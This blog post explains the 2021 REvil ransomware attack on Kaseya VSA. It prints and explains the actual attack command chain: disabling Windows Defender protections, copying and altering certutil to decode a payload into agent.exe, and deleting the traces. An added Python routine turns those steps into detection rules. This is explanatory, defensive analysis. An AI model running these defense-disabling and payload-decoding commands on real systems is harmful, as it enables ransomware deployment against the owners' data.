Kaseya MSP supply chain attack, REvil hacking group demand $70 million

Rajesh
5 min read, Jul 6, 2021

Kaseya, an MSP, was the victim of a sophisticated cyberattack that left multiple clients across the globe with a ransom note and their data encrypted.

The timing of the attack looks well planned: most of the people at this US-based MSP were leaving for the long 4th of July weekend (US Independence Day, a federal holiday) when the attack hit on Friday, 2 July 2021.

REvil, aka Sodinokibi, is a notorious cyber-criminal group that runs a RaaS (ransomware-as-a-service) operation, has been active since 2019 and is allegedly Russia-linked. They always demand ransom in cryptocurrency (Bitcoin), as it is hard to trace and is the best way to hide themselves after the extortion.

High-level sequence of events that led to this ransomware attack

How REvil used a zero day in the Kaseya ransomware attack and compromised MSP clients

Most Kaseya customers run an on-prem VSA server placed on the client's premises, which manages a large fleet of servers; if the MSP's main machine is infected, all client machines can be impacted too. The Kaseya VSA zero day, CVE-2021-30116, found by the Dutch Institute for Vulnerability Disclosure (DIVD), was the one exploited by the REvil group.

Kaseya VSA Zero Day attack (Source: blog.truesec.com)

The attack happens when a set of DOS and PowerShell commands is executed on the target machine, which results in encryption. Below is the command that was used; we will break the commands down and try to understand what each of them is doing.

Actual attack command that triggers encryption

Let us break this set of commands down and understand them one by one.

1) Run ping against localhost a random number of times; -n is the count here, so this is effectively a delay before the rest of the chain runs

ping 127.0.0.1 -n 5693 > nul

2) The PowerShell Set-MpPreference cmdlet configures preferences for Windows Defender, here with multiple options/parameters

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

  • DisableIntrusionPreventionSystem — Indicates whether to configure network protection against exploitation of known vulnerabilities. If you specify a value of $False or do not specify a value, network protection is enabled.
  • DisableIOAVProtection — Indicates whether Windows Defender scans all downloaded files and attachments. If you specify a value of $False or do not specify a value, scanning of downloaded files and attachments is enabled.
  • DisableScriptScanning — Specifies whether to disable the scanning of scripts during malware scans. If you specify a value of $False or do not specify a value, Windows Defender does not scan scripts.
  • EnableControlledFolderAccess — Controlled Folder Access helps you protect valuable data from malicious apps and threats, such as ransomware.
  • EnableNetworkProtection AuditMode — Network protection helps to prevent employees from using any application to access dangerous domains that may host phishing scams, exploits and other malicious content on the internet.
    Audit Mode: Users and applications can connect to dangerous domains; however, if this feature would have blocked access had it been set to Block, a record of the event is written to the event logs.
  • MAPSReporting — Specifies the type of membership in Microsoft Active Protection Service. Microsoft Active Protection Service is an online community that helps you choose how to respond to potential threats.
    0: Disabled. Send no information to Microsoft. This is the default value.
  • SubmitSamplesConsent — Specifies how Windows Defender checks for user consent for certain samples. If consent has previously been granted, Windows Defender submits the samples. If the MAPSReporting parameter does not have a value of Disabled, Windows Defender prompts the user for consent.

3) Copy certutil.exe from System32 to C:\Windows so the copy can be manipulated

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

4) Append a random number to the copied file, which changes its file hash

echo %RANDOM% >> C:\Windows\cert.exe

5) The copied certutil is now used to decode the payload agent.crt and write it out as agent.exe in the Kaseya working folder.

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe

6) Silently clean up the certificate file and the copied certutil

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
/q Specifies quiet mode
/f Forces deletion of read-only files

7) Finally, the agent.exe created in step 5 is started by Kaseya's AgentMon.exe, which runs with high privilege due to the nature of its work, and it begins to deploy the actual ransomware on the system.

c:\kworking\agent.exe
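As an added example (not from the original post and not Kaseya's or Sophos's code), here is a small Python detection routine that turns the seven-step chain above into rules and runs them over constructed process-creation log lines; the "parent => command line" log format, the ping-count threshold and the three-stage alert threshold are assumptions.

```python
import re

# Constructed sample process-creation records ("parent => command line"),
# modelled on the chain described above; not real telemetry from the incident.
SAMPLE_LOG = [
    "AgentMon.exe => cmd.exe /c ping 127.0.0.1 -n 5693 > nul",
    "cmd.exe => powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true",
    "cmd.exe => copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe",
    "cmd.exe => C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe",
    "cmd.exe => del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe",
    "AgentMon.exe => c:\\kworking\\agent.exe",
    "explorer.exe => notepad.exe C:\\Users\\bob\\notes.txt",   # benign noise
    "svchost.exe => ping 8.8.8.8 -n 4",                        # benign noise
]

# One rule per stage of the chain. The ping threshold (count >= 100) is an
# assumption: a localhost ping with a large -n is a delay, not diagnostics.
RULES = [
    ("defender_tamper",    re.compile(r"Set-MpPreference\b.*-Disable\w*\s+\$true", re.I)),
    ("ping_sleep",         re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I)),
    ("certutil_copied",    re.compile(r"\bcopy\b.*certutil\.exe\s+\S+", re.I)),
    ("certutil_decode",    re.compile(r"\S+\.exe\s+-decode\b", re.I)),  # also catches the renamed copy
    ("kaseya_working_dir", re.compile(r"\\kworking\\agent\.(?:crt|exe)\b", re.I)),
]

def match_rules(line):
    """Return the names of every rule whose pattern fires on one log line."""
    return [name for name, pat in RULES if pat.search(line)]

def scan(lines):
    """Map each rule that fired to the 0-based indices of the lines it fired on."""
    hits = {}
    for i, line in enumerate(lines):
        for name in match_rules(line):
            hits.setdefault(name, []).append(i)
    return hits

def is_chain(hits, min_rules=3):
    """Alert only when several distinct stages appear together; any single
    stage (for example one certutil -decode) is too noisy on its own."""
    return len(hits) >= min_rules

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for name, idxs in found.items():
        print(f"{name:20s} lines {idxs}")
    print("chain detected:", is_chain(found))
```

In a real deployment the same rules would be applied per host over a short time window rather than over one batch, so that stages from unrelated hosts are not combined.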

Kaseya MSP ransomware attack sequence of steps
Technical steps summary of this attack

Why don’t we just use data recovery tools to recover data?

This ransomware performs in-place encryption, which means the encrypted data is stored in the same sectors where the original data was; most recovery tools cannot recover the data for this reason.

What next?

Impacted companies might look to their backups to restore their systems, while closed-door negotiations might progress in the presence of cyber security consultants to negotiate the ransom amount.

Meanwhile, each impacted client was asked for about 50k in Bitcoin (BTC) as per the ransom note, and REvil is also offering a universal decrypter for $70 million.

It is likely that impacted clients will sue Kaseya for damages when the dust settles.

REvil Universal $70 million bitcoin decrypt offer
REvil ransomware demo on machine (Source: Sophos)

In this article we are only trying to give a glimpse of what happened in this attack, not go into details, as there are professional blogs that give much better in-depth accounts of what happened.

We have referred to multiple blogs and would like to thank them for their work.
